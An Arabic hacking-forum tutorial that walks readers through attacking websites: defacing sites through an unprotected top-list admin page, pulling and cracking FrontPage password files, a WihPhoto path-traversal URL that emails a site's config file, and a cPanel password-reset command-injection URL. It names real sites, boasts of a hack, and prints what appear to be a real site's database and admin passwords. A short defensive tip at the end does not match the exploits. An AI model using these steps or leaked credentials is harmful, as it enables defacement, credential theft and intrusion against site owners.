الدرس الثاني

الدرس الثانى ><><><

][®][^][®][][®][^][®][
وهوا ثغرات المواقع ونبداء من اول ثغراته ونبدء باولال الثغرات

~!~ ثغرة سباق المواقع ~!~

=====================

أولا إذهب إلى أي محرك بحث .. مثلا GOOGLE

وإكتبtop_list/list.php3

رح تلقى الكثير من المواقع ورح يكون اخر الموقع كدا

top_list/list.php3

مثلا هذا الموقع

http://www.coreground.de/top_list/list.php3

وكذا يكون دخلنا صفحة سباق المواقع


قم بمسح هذا "list.php3" وبدله بـ

admin/updates_admin.php3

سيصبح عنوان الموقع هكذا

http://www.coreground.de/top_list/a...ates_admin.php3

إدخل على هذا العنوان

ومن ثم سيظهر لك مربع

قم بالذهاب الى الفرونت بيج واكتب الي تبيه مثلا

HACKED BY ALNOR3S

وثم اذهب من الفرونت بيج الى خانة HTML

وانسخ مابداخله بالكامل وضعه في المربع الي في هذا العنوان



http://www.coreground.de/top_list/a...ates_admin.php3

بعد كذا اضغط رفع ليرفع الكلام الي الصفحة

ادخل الى الموقع http://www.coreground.de/top_list/list.php3


وشوف توقيعك الي سويته في الفرونت بيج

==================
عيب هذه الثغرة ان اي واحد يعرف الثغرة يقدر يخترق بعدك ...

وهذا الموقع تم اختراقه من قبلى

http://forums.thebreeze.org/

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

ثغرة الفرنت بيج
الفرونت بيج يعتبر من اهم البرامج في انشاء المواقع , ولكن يوجد به ثغرة قويه تمكنك من اختراق موقع الضحيه وامتلاكه
وسوف اقوم بعرض هذهي الثغره بشكل مبسط


نبدا :


اول شي لازم تعرف اذا الموقع يدعم الفرونت بيج وله لا
روح على هذا الموقع Netcraft (Netcraft) واكتب اسم الموقع وستجد معلومات عن الموقع , ومن بينها اذا كان يدعم الفرونت بيج وله لا .

شرح الثغرة :

الفرونت بيج عند تنصيبه يقوم باقامة فولدرات وهي :

/_private

/_vti_bin

/_vti_cnf

/_vti_log

/_vti_pvt (اخطرهم )

/_vti_txt


ولتطبيق الثغره , اكتب اسم الموقع في المتصفح وبعدين اكتب وراه الثغره
مثال : /http://xxxx.com/_vti_pvt

او يمكنك استخدام برامج البحث عن ثغرات المواقع , و الي من اهمها برنامج عمران omran scan

اوكيه بعد هذي الخطوه بتدخل على الفولدر الي كتبناه (_vit_pvt_/)

وداخله بتحصل ملف مهم جدا باسم service.pw

هذا الملف يحتوي على باسورد صاحب الموقع ولكنه مشفر بمقياس des

ولفك الشفره بنستخدم برنامج john de ripe

حمل الملف السابق service.pw على جهازك وافتح الملف بواسطة برنامج john de ripe , الي يعتمد على تحويل الملف من encypretd الى plan ****
يعنى تحويل الكلمه المشفره الى كلمه عاديه .

وبعد ما تفك الشفره خلاص صار الباسورد في ايدك وتستطيع التحكم بالموقع عن طريق الفرونت بيج او رفعه ببرامج ال ftp .

اتمنى انكم استفدتو , وانكم ما تستخدمون الطريقة في اذيت اخوانكم المسلمين .

وهذا برنامج john de riper
h4palestine.com

ثغرات المنتديات

!!!!
sniper-x

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


يتــــــــــــــــــــــــــــــــبع ][®][^][®][][®][^][®][


















ثغرة عبارة عن ثغرة php


هذه الثغرة عبارة عن ثغرة php

هذه الثغرة تعتمد على نظام الاختراق العشوائي
بمعني أننا سنبحث عن هذه الثغرة في المواقع التي تحتوي على هذه الثغرة من خلال محرك البحث جوجل
نضع في خانة البحث
"powered by wihphoto"

طبعا سوف يجد لنا مواقع كثيرة نختار الموقع الأول على سبيل المثال وهو
http://spikies-chinchilla-news.de/p...lerie/admin.php (http://spikies-chinchilla-news.de/p...lerie/admin.php)

نقوم بحذف من الموقع admin.php
ونضيف إليه الجمله التالية
sendphoto.php?album=..&pic=config.inc.php

فبالتالي يصبح العنوان لدينا كالتالي

http://spikies-chinchilla-news.de/p...=config.inc.php (http://spikies-chinchilla-news.de/p...=config.inc.php)


ادخل تحت جمله
Sende config.inc.php an

اميلك بالكامل واضغط على زر الارسال
سوف تصلك رسالة فورية بعد ثواني

سوف تصلك على اميلك رسالة بها ملف ملف مرفق اسمه ._albums_.._config.inc.php

عندما تقوم بفتح هذا الملف سوف تجد التالي

FREE FOR NON-COMMERCIAL USE <-- */
/ *************************
*************************
*************************
**/


// WihPhoto Versionsnummer
// =======================
$version = "0.86-dev";

$language = "german.php"; // Sprachfiles z.B. "german.php" fuer Deutsch
// siehe $language Verzeichnis

// http - Adresse:
// ===============
// Bei 0.86-dev noch ohne Bedeutung!
$wihphoto_http = "http://";


// Verzeichnisse:
// ==============
$wihphoto_dir = "/var/www/web1/html/photogallerie"; // Pfad absolut
$wihphotodir = "/var/www/web1/html/photogallerie"; // Pfad absolut
$pix_base = "albums"; // ... die Orginalphotos Pfad relativ
$dyn_base = "auto"; // ... die dynamisch generierten Photos Pfad relativ
$lang_dir = "languages"; // ... language packs Pfad relativ


// WihPhoto - Darstellungsoptionen
// =========================
======
$items_per_page = 20; // maximale Anzahl Photos/Seite
$display_cols = 4; // Spalten pro Seite
$default_size = 512; // Standardbreite der Bilder bei Betrachtung des Albums
$thumb_size = 120; // Breite der generierten Thumpnails

// Breite der Bilder welche generiert werden
// =========================
================
$viewsizes = array(400,512,640,800,"Original");

// Wenn man einen Link zur Hauptseite der Homepage machen mِchte kann er mit $sitehome
// zur Navigationsleiste hinzugefügt werden
// =========================
=========================
=========================
========
$sitehome = "http://spikies-chinchilla-news.de/basefr.htm";


// Startseite von WihPhoto: 1 = Umfangreich, mit Bild, Beschreibung, ....
// 0 = einfache Auflistung der Alben
// =========================
=========================
====================
$startsite = 1;

// MySQL-DB Einstellungen
// ======================
$database = "usr_web1_5"; //MySQL Datenbankname
$sqlhost = "localhost"; //MySQL Hostname
$sqluser = "web1"; //MySQL Username
$sqlpass = "q+q27rym"; //MySQL Passwort


// Passwort zum hinzufügen von Bildinformations****
// =========================
=======================
$adminpass= "galleriemaster";

// Wird PHP im SAFE MODE betrieben?
// =========================
=======
$safemode = false; // true ... SAFE MODE, false ... kein SAFE MODE

// E-Mail Einstellungen für die "SendPhoto" Funktion
// =========================
========================
$subject = "Spikies-Photogallerie"; // E-Mail Subject
$replyto = "Spike@spikies-chinchilla-news.de"; // Sende E-Mail Adresse


// -----------------------------------------------------------------------
// ab hier keine ؤnderungen notwendig!
// -----------------------------------------------------------------------

// MySQL - Tabellennamen
// =====================

$wp_start = "wp_start"; // Startseite (Albennamen, Albuminfos, Reihung, ...)
$wp_photoinfo = "wp_photoinfo"; // Beschreibungen zu den einzelnen Photos


// Zur Grafikenerzeugung:
// "gd" ... GD (GD Graphics Library (GD Graphics Library))
// "im" ... ImageMagick (http://www.imagemagick.org/ (http://www.imagemagick.org/))
// =========================
=
$ImageTool = "gd";

// Falls als $ImageTool "im" also ImageMagick gewنhlt wurde
// muss der Pfad zur "convert" Funktion angegeben werden!
$convert = "/usr/bin/convert";

// EXIF Support
// (funkt noch nicht!)
// ===================
$show_exif = 0;

// Rand bei Thumpnails
// ===================
$thumb_border = 1;

// Sprachfiles laden:
require ("$wihphoto_dir/$lang_dir/$language");
?>

*************************
*************************
*************************
******
ولكن اعتقد أن أهم شئ من هذا الملف كله هو هذا المقطع

// MySQL-DB Einstellungen
// ======================
$database = "usr_web1_5"; //MySQL Datenbankname
$sqlhost = "localhost"; //MySQL Hostname
$sqluser = "web1"; //MySQL Username
$sqlpass = "q+q27rym"; //MySQL Passwort


// Passwort zum hinzufügen von Bildinformations****
// =========================
=======================
$adminpass= "galleriemaster";


حيث يذكر لن االباسووردات الخاصة بالموقع وقاعدة البيانات


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


ثغره لوحه التحكم المواقع Cpanel للكاتب SmaRt

المعروف أن Cpanel هي لوحة تحكم تضاف للمواقع لإمكانية التحكم في جميع ما يحتويه الموقع
يوجد منفذ لعمل دفع أو ما يسمونه أمر ريموت في البرنامج Cpanel
اكتشفت ثغرة في هذا المنفذ الذي يظهر المطلوب لتصحيح النقص الخارجي أو
الذي يكون مزود ببيانات للسكربت الذي يقوم باسترجاع الاسم والرقم السري

الهكرز طبعا استغلوا هذه الثغرة من المشكلة بدهاء وبراعة حيث يطلبون الURI كأنهم يستخدمون السكربت عادي
ليجهزوا خاصية الشيل والأوامر التحكمية لكل قيمة ومتغير (خلصنا مناقشة )

نأتي الآن للنسخ المصابة وهي :
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1

والثغرة تطبق على النحو التاالي :
http://www.example.com:2082/resetpass/?user=|">ls"|

حيث ان example.com هو عنوان الموقع
اعذروني لاني ما جربت الثغرة الى الان لاني اول ما قرأتها وضعتها لكم

طريقة اكتشاف الثغرة :
وصلت رسالة الى موقع SecurityFocus (SecurityFocus)
من Arab ViruZ أحد أعضاء Saudi Devilz Team

والرسالة على النحو التالي (ترجمتها) :-
العنوان : Cpanel 8 تحتوي على مشكلة ؟؟
البريد : Arab VieruZ <arabviersus hotmail com>
عندما جربت ارجع الباسورد تبعي

جربت هذه الوصلة :
http://cpanel.com:2082/resetpass/?user=|">ls"|

لكنني حصلت على هذا :
*/

sh: line 1: /var/cpanel/users/: is a directory "sh: line 1: >ls: command not found"


Password Reset
Resetting password for |">ls"|: A confirmation email has been sent to the email address
on file.

*/

انظر الى هذه
sh: line 1: >ls: command not found

هل هذه مشكلة

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



!!!!
sniper-x
---------------------------------------------------
الحل
---------------------------------------------------


للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة ********** فاذا وضعت <img> او ********* او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .


.
الهم وفق كل من طلب علما ينتفع به